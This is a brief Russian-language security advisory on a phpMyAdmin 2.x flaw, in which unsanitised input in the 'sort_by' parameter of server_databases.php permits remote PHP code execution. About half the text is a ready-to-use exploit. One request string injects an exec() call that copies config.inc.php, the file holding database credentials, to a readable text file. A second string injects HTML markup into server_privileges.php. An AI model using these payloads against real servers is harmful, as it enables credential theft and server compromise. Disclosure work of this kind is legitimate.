Программа: phpMyAdmin 2.x
Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "sort_by" сценарием server_databases.php. Удаленный
пользователь может выполнить произвольный PHP код на целевой системе.
Эксплоит:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php"
config.txt'); //&sort_order=desc&token=[valid token]
server_privileges.php?token=[valid token]&username="><plaintext>&hostname="><plaintext>&dbname=&tablename=
